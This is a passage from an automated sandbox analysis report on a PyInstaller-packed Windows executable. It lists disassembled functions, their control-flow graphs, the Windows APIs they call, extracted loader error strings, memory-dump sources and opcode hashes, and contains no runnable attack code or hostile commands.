                                                                                                                                                                                                                                                        • Instruction ID: cfc4742d87f74047e8abebaada8302a674a130fb90fb1d0c03b40b1d6c716977
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22C1AE32B28A4185FB10CFA9D6906BD3761FB49B98F014226DE1E97BD4CF38E461C380
                                                                                                                                                                                                                                                        Function 00007FF6D92483C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D924842B
                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D92484AE
                                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D92484CD
                                                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D92484DB
                                                                                                                                                                                                                                                        • FindClose.KERNELBASE(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D92484EC
                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNELBASE(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D92484F5
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                        • Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                                        • Instruction ID: 5e030df47e091e300b2cfc5277fafb3b971cf17dbf9ec107daf67d2f8dca4ab2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F416421A3C58295FE209F64E6441BE63A0FBA9754F400233D55DC3AD4EF3CD559CB80
                                                                                                                                                                                                                                                        Function 00007FF6D9265E7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1014 7ff6d9265e7c-7ff6d9265eb1 call 7ff6d9265588 call 7ff6d9265590 call 7ff6d92655f8 1021 7ff6d9265eb7-7ff6d9265ec2 call 7ff6d9265598 1014->1021 1022 7ff6d9265fef-7ff6d926605d call 7ff6d925a900 call 7ff6d9261578 1014->1022 1021->1022 1027 7ff6d9265ec8-7ff6d9265ed3 call 7ff6d92655c8 1021->1027 1034 7ff6d926606b-7ff6d926606e 1022->1034 1035 7ff6d926605f-7ff6d9266066 1022->1035 1027->1022 1033 7ff6d9265ed9-7ff6d9265efc call 7ff6d925a948 GetTimeZoneInformation 1027->1033 1048 7ff6d9265f02-7ff6d9265f23 1033->1048 1049 7ff6d9265fc4-7ff6d9265fee call 7ff6d9265580 call 7ff6d9265570 call 7ff6d9265578 1033->1049 1036 7ff6d92660a5-7ff6d92660b8 call 7ff6d925d5fc 1034->1036 1037 7ff6d9266070 1034->1037 1039 7ff6d92660fb-7ff6d92660fe 1035->1039 1051 7ff6d92660ba 1036->1051 1052 7ff6d92660c3-7ff6d92660de call 7ff6d9261578 1036->1052 1040 7ff6d9266073 1037->1040 1039->1040 1041 7ff6d9266104-7ff6d926610c call 7ff6d9265c00 1039->1041 1045 7ff6d9266078-7ff6d92660a4 call 7ff6d925a948 call 7ff6d924c550 1040->1045 1046 7ff6d9266073 call 7ff6d9265e7c 1040->1046 1041->1045 1046->1045 1053 7ff6d9265f25-7ff6d9265f2b 1048->1053 1054 7ff6d9265f2e-7ff6d9265f35 1048->1054 1059 7ff6d92660bc-7ff6d92660c1 call 7ff6d925a948 1051->1059 1071 7ff6d92660e5-7ff6d92660f7 call 7ff6d925a948 1052->1071 1072 7ff6d92660e0-7ff6d92660e3 1052->1072 1053->1054 1060 7ff6d9265f37-7ff6d9265f3f 1054->1060 1061 7ff6d9265f49 1054->1061 1059->1037 1060->1061 1067 7ff6d9265f41-7ff6d9265f47 1060->1067 1063 7ff6d9265f4b-7ff6d9265fbf call 7ff6d926a4d0 * 4 call 7ff6d9262b5c call 7ff6d9266114 * 2 1061->1063 1063->1049 1067->1063 1071->1039 1072->1059
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6D9265EAA
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D92655F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D926560C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6D9265EBB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9265598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92655AC
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6D9265ECC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D92655C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92655DC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A95E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A948: GetLastError.KERNEL32(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A968
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D926610C), ref: 00007FF6D9265EF3
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                        • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                        • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                                        • Instruction ID: 25a3a8369560544cbd8131752c635178d8c9d0a525411195b5f20d6c675ca29a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83517D32A2864286F724DF65EA815AD7761FB88784F404137EA4DC7B9ADF3CE521C780
                                                                                                                                                                                                                                                        Function 00007FF6D9249280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                                        • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                        • Instruction ID: 197d6703327ca0476f7df647dc377543a3ef7293deeb1d5b6b246ce2f7d6215e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3F0C826A2C74186FB60CF64B58876E7350BB98728F040336D96D52AD4DF3CD068CF00
                                                                                                                                                                                                                                                        Function 00007FF6D9241950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 331 7ff6d9241950-7ff6d924198b call 7ff6d92445c0 334 7ff6d9241991-7ff6d92419d1 call 7ff6d9247f90 331->334 335 7ff6d9241c4e-7ff6d9241c72 call 7ff6d924c550 331->335 340 7ff6d92419d7-7ff6d92419e7 call 7ff6d92506d4 334->340 341 7ff6d9241c3b-7ff6d9241c3e call 7ff6d925004c 334->341 346 7ff6d92419e9-7ff6d9241a03 call 7ff6d9254f08 call 7ff6d9242910 340->346 347 7ff6d9241a08-7ff6d9241a24 call 7ff6d925039c 340->347 345 7ff6d9241c43-7ff6d9241c4b 341->345 345->335 346->341 353 7ff6d9241a26-7ff6d9241a40 call 7ff6d9254f08 call 7ff6d9242910 347->353 354 7ff6d9241a45-7ff6d9241a5a call 7ff6d9254f28 347->354 353->341 361 7ff6d9241a5c-7ff6d9241a76 call 7ff6d9254f08 call 7ff6d9242910 354->361 362 7ff6d9241a7b-7ff6d9241b05 call 7ff6d9241c80 * 2 call 7ff6d92506d4 call 7ff6d9254f44 354->362 361->341 375 7ff6d9241b0a-7ff6d9241b14 362->375 376 7ff6d9241b16-7ff6d9241b30 call 7ff6d9254f08 call 7ff6d9242910 375->376 377 7ff6d9241b35-7ff6d9241b4e call 7ff6d925039c 375->377 376->341 382 7ff6d9241b50-7ff6d9241b6a call 7ff6d9254f08 call 7ff6d9242910 377->382 383 7ff6d9241b6f-7ff6d9241b8b call 7ff6d9250110 377->383 382->341 391 7ff6d9241b8d-7ff6d9241b99 call 7ff6d9242710 383->391 392 7ff6d9241b9e-7ff6d9241bac 383->392 391->341 392->341 393 7ff6d9241bb2-7ff6d9241bb9 392->393 396 7ff6d9241bc1-7ff6d9241bc7 393->396 398 7ff6d9241bc9-7ff6d9241bd6 396->398 399 7ff6d9241be0-7ff6d9241bef 396->399 400 7ff6d9241bf1-7ff6d9241bfa 398->400 399->399 399->400 401 7ff6d9241bfc-7ff6d9241bff 400->401 402 7ff6d9241c0f 400->402 401->402 403 7ff6d9241c01-7ff6d9241c04 401->403 404 7ff6d9241c11-7ff6d9241c24 402->404 403->402 405 7ff6d9241c06-7ff6d9241c09 403->405 406 7ff6d9241c26 404->406 407 7ff6d9241c2d-7ff6d9241c39 404->407 405->402 408 7ff6d9241c0b-7ff6d9241c0d 405->408 406->407 407->341 407->396 408->404
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9247F90: _fread_nolock.LIBCMT ref: 00007FF6D924803A
                                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF6D9241A1B
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6D9241B6A), ref: 00007FF6D924295E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                        • Opcode ID: 366ee5d3afceab38ba1fccf279b745a5e3150e0a5f226ca546ddb68d3ae287d0
                                                                                                                                                                                                                                                        • Instruction ID: 8a7be08f1889e787f5a7a87e71ba11c81de2b33eb88026d914b00db4016807a9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 366ee5d3afceab38ba1fccf279b745a5e3150e0a5f226ca546ddb68d3ae287d0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11819F71A2C68686FB60DF24DA412BD73A0AF68784F404433D98DC7B8ADE3CE565CB41
                                                                                                                                                                                                                                                        Function 00007FF6D9241600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 409 7ff6d9241600-7ff6d9241611 410 7ff6d9241637-7ff6d9241651 call 7ff6d92445c0 409->410 411 7ff6d9241613-7ff6d924161c call 7ff6d9241050 409->411 416 7ff6d9241653-7ff6d9241681 call 7ff6d9254f08 call 7ff6d9242910 410->416 417 7ff6d9241682-7ff6d924169c call 7ff6d92445c0 410->417 418 7ff6d924162e-7ff6d9241636 411->418 419 7ff6d924161e-7ff6d9241629 call 7ff6d9242710 411->419 426 7ff6d92416b8-7ff6d92416cf call 7ff6d92506d4 417->426 427 7ff6d924169e-7ff6d92416b3 call 7ff6d9242710 417->427 419->418 434 7ff6d92416f9-7ff6d92416fd 426->434 435 7ff6d92416d1-7ff6d92416f4 call 7ff6d9254f08 call 7ff6d9242910 426->435 433 7ff6d9241821-7ff6d9241824 call 7ff6d925004c 427->433 443 7ff6d9241829-7ff6d924183b 433->443 436 7ff6d9241717-7ff6d9241737 call 7ff6d9254f44 434->436 437 7ff6d92416ff-7ff6d924170b call 7ff6d9241210 434->437 448 7ff6d9241819-7ff6d924181c call 7ff6d925004c 435->448 449 7ff6d9241739-7ff6d924175c call 7ff6d9254f08 call 7ff6d9242910 436->449 450 7ff6d9241761-7ff6d924176c 436->450 445 7ff6d9241710-7ff6d9241712 437->445 445->448 448->433 462 7ff6d924180f-7ff6d9241814 449->462 451 7ff6d9241802-7ff6d924180a call 7ff6d9254f30 450->451 452 7ff6d9241772-7ff6d9241777 450->452 451->462 455 7ff6d9241780-7ff6d92417a2 call 7ff6d925039c 452->455 464 7ff6d92417da-7ff6d92417e6 call 7ff6d9254f08 455->464 465 7ff6d92417a4-7ff6d92417bc call 7ff6d9250adc 455->465 462->448 472 7ff6d92417ed-7ff6d92417f8 call 7ff6d9242910 464->472 470 7ff6d92417be-7ff6d92417c1 465->470 471 7ff6d92417c5-7ff6d92417d8 call 7ff6d9254f08 465->471 470->455 474 7ff6d92417c3 470->474 471->472 477 7ff6d92417fd 472->477 474->477 477->451
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                        • Opcode ID: 4ba9704c2667ef3387b8ad085b4ce1cd9035ff509126d6a3bfbf4b4a2ffdb3da
                                                                                                                                                                                                                                                        • Instruction ID: 6bd03d323095a1bb4be6c75c47db71f8cc9d53c1a6b641e574165910932f77e0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ba9704c2667ef3387b8ad085b4ce1cd9035ff509126d6a3bfbf4b4a2ffdb3da
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3518E21B2964392FA10AF51AA011BD73A0BF68794F444533EE4D87B9ADF3CE575CB80
                                                                                                                                                                                                                                                        Function 00007FF6D9248660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,00000000,00007FF6D9243CBB), ref: 00007FF6D9248704
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6D9243CBB), ref: 00007FF6D924870A
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00007FF6D9243CBB), ref: 00007FF6D924874C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248830: GetEnvironmentVariableW.KERNEL32(00007FF6D924388E), ref: 00007FF6D9248867
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6D9248889
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9258238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9258251
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242810: MessageBoxW.USER32 ref: 00007FF6D92428EA
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                        • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                        • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                        • Instruction ID: 3b720f627c51ce67968b1a7da087867c6f71361342c80c3bd128b0f679f0a304
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46419011A3964244FA50EF66AB652BD1391AF997C4F804133ED0DC7BDAEE3CE525CB80
                                                                                                                                                                                                                                                        Function 00007FF6D9241210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 756 7ff6d9241210-7ff6d924126d call 7ff6d924bd80 759 7ff6d9241297-7ff6d92412af call 7ff6d9254f44 756->759 760 7ff6d924126f-7ff6d9241296 call 7ff6d9242710 756->760 765 7ff6d92412b1-7ff6d92412cf call 7ff6d9254f08 call 7ff6d9242910 759->765 766 7ff6d92412d4-7ff6d92412e4 call 7ff6d9254f44 759->766 779 7ff6d9241439-7ff6d924144e call 7ff6d924ba60 call 7ff6d9254f30 * 2 765->779 772 7ff6d9241309-7ff6d924131b 766->772 773 7ff6d92412e6-7ff6d9241304 call 7ff6d9254f08 call 7ff6d9242910 766->773 775 7ff6d9241320-7ff6d9241345 call 7ff6d925039c 772->775 773->779 785 7ff6d924134b-7ff6d9241355 call 7ff6d9250110 775->785 786 7ff6d9241431 775->786 793 7ff6d9241453-7ff6d924146d 779->793 785->786 792 7ff6d924135b-7ff6d9241367 785->792 786->779 794 7ff6d9241370-7ff6d9241398 call 7ff6d924a1c0 792->794 797 7ff6d9241416-7ff6d924142c call 7ff6d9242710 794->797 798 7ff6d924139a-7ff6d924139d 794->798 797->786 799 7ff6d9241411 798->799 800 7ff6d924139f-7ff6d92413a9 798->800 799->797 802 7ff6d92413ab-7ff6d92413b9 call 7ff6d9250adc 800->802 803 7ff6d92413d4-7ff6d92413d7 800->803 807 7ff6d92413be-7ff6d92413c1 802->807 805 7ff6d92413d9-7ff6d92413e7 call 7ff6d9269e30 803->805 806 7ff6d92413ea-7ff6d92413ef 803->806 805->806 806->794 809 7ff6d92413f5-7ff6d92413f8 806->809 810 7ff6d92413cf-7ff6d92413d2 807->810 811 7ff6d92413c3-7ff6d92413cd call 7ff6d9250110 807->811 813 7ff6d924140c-7ff6d924140f 809->813 814 7ff6d92413fa-7ff6d92413fd 809->814 810->797 811->806 811->810 813->786 814->797 816 7ff6d92413ff-7ff6d9241407 814->816 816->775
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                        • Opcode ID: 8c3d3767c92c3f25500c132f33d9ae5f36ceff73d91df2c2d10727b506476509
                                                                                                                                                                                                                                                        • Instruction ID: 268c282573fa5c687afce056b4cbdec0966b675da94471dd5496056e077a9830
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3d3767c92c3f25500c132f33d9ae5f36ceff73d91df2c2d10727b506476509
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E51F722A2864241FA619F11AA413BE7690FF69794F444133ED4DC7BCAEF3CE425CB40
                                                                                                                                                                                                                                                        Function 00007FF6D925ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6D925F0AA,?,?,-00000018,00007FF6D925AD53,?,?,?,00007FF6D925AC4A,?,?,?,00007FF6D9255F3E), ref: 00007FF6D925EE8C
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6D925F0AA,?,?,-00000018,00007FF6D925AD53,?,?,?,00007FF6D925AC4A,?,?,?,00007FF6D9255F3E), ref: 00007FF6D925EE98
